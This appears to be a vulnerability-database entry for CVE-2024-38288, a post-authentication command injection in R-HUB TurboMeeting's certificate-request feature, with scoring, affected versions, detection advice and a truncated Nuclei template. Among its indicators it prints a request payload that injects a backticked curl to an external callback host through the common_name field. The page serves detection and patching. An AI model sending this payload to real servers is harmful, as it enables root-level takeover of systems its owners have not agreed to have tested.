CVE-2024-38288
published 2024-07-25CVE-2024-38288: A command-injection issue in the Certificate Signing Request (CSR) functionality in R-HUB TurboMeeting through 8.x allows authenticated attackers with…
PriorityP258high7.2CVSS 3.1
AVNACLPRHUINSUCHIHAH
EXPLOIT
EPSS
3.22%
86.6th percentile
A command-injection issue in the Certificate Signing Request (CSR) functionality in R-HUB TurboMeeting through 8.x allows authenticated attackers with administrator privileges to execute arbitrary commands on the underlying server as root.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| rhubcom | turbomeeting | < 8.0 | 8.0 |
Detection & IOCsextracted from sources · hover to see the quote
commandsid={{sid}}&common_name=1"%20out%20/dev/null"`curl%20{{interactsh-url}}`&company_name=1&state=1&city=1&country=US&submit=Generate+CSR↗
- →Monitor POST requests to /as/wapi/generate_csr containing shell metacharacters (backticks, percent-encoded quotes, pipe characters) in the common_name, company_name, state, city, or country fields — these indicate command injection attempts in the CSR generation endpoint. ↗
- →Alert on successful authentication to /as/wapi/login followed immediately by a POST to /as/wapi/generate_csr within the same session (sid), especially from admin accounts, as this matches the exploit flow. ↗
- →Look for outbound DNS or HTTP callbacks (e.g., curl to external hosts) originating from the TurboMeeting server process, which may indicate successful command injection via the CSR feature. ↗
- →The session ID (sid) is extracted from a redirect URL pattern after login; monitor for automated extraction of sid values followed by CSR generation requests as a sign of scripted exploitation. ↗
- ·Exploitation requires valid administrator credentials — this is a post-authentication vulnerability, so detections should be scoped to authenticated admin sessions. ↗
- ·The injected commands execute as root on the underlying server, meaning successful exploitation grants full system compromise; prioritize detection and response accordingly. ↗
- ·The vulnerability affects R-HUB TurboMeeting through version 8.x; ensure detection rules are applied to all instances up to and including the 8.x branch. ↗
- ·The exploit template uses a 20-second timeout for the CSR request, suggesting the injected command may introduce a delay; network-level detections should account for unusually long response times on /as/wapi/generate_csr. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No advisories linked to this vulnerability.
No detection rules found.
Nuclei
TurboMeeting - Post-Authentication Command Injection
nuclei·CVSS 7.2
CVE-2024-38288 [HIGH] TurboMeeting - Post-Authentication Command Injection
TurboMeeting - Post-Authentication Command Injection
The Certificate Signing Request (CSR) feature in the admin portal of the application is vulnerable to command injection. This vulnerability could allow authenticated admin users to execute arbitrary commands on the underlying server by injecting malicious input into the CSR generation process. The application failed to properly sanitize user-supplied input before using it in a command executed privileges.
Template:
id: CVE-2024-38288
info:
name: TurboMeeting - Post-Authentication Command Injection
author: rootxharsh,iamnoooob,pdresearch
severity: high
description: |
The Certificate Signing Request (CSR) feature in the admin portal of the application is vulnerable to command injection. This vulnerability could allow authenticated admi
No writeups or analysis indexed.
2024-07-25
Published